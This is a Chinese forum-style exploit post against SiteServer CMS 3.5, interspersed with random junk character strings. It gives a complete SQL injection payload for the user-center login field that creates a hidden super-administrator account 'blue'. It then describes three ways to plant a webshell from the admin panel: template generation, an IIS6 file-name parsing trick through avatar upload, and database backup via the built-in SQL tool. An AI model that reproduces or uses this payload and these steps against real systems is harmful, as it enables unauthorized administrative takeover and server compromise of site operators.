经测试秒杀最新的3.5版
6 t& Z$ h3 h" @7 ]- Q) bstieserver官网:www.siteserver.cn) a6 [9 {! E- }# ?6 d
EXP:
6 z; _: @" q! t7 l1 C& s4 R直接访问UserCenter/login.aspx; p! A2 r u/ v% M
用户名处输入:3 L( |7 }' |) s# j* B
3 L) z0 x! V, e- t: Y123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–/ ~+ ^$ C* d/ }2 [0 d% g7 E3 y8 z
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。2 s7 d8 i3 d' p! k* w8 G. L/ h
之后再访问后台SiteServer/login.aspx用插入的用户登陆1 L, X& c) \, L3 A1 z+ m
后台拿webshell的三种方法:' x- }' E9 r- Z9 J9 ~1 h& q( O
一、7 E! O4 U" T U/ q" }# J
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
6 D9 f8 w4 V% {' S/ |) q/ g二、" c$ m5 Z, Z4 [1 l" L
成员权限-》添加用户-》用户名为:1.asp+ W& Z& A- ^$ I
http://127.0.0.1/usercenter/+ b: h4 s: ^2 u1 a- w0 J) m
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
X7 H/ y$ O+ X6 C1 R(ps:后台添加用户时不会验证是否含有非法字符)
% k3 Y) Y, }$ e0 F0 ]3 j8 A三、# ^3 ]6 ^! ~/ X& u1 w5 [, k
系统工具-》实用工具-》机器参数查看$ ?& ~2 U$ p5 b" {% o/ }- Y, O
可以看到数据库类型、名称,WEB路径
7 v' P2 t$ e* A. A! R系统工具-》数据库工具-》SQL语句查询' U, Q% t! G# z' ~; F
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |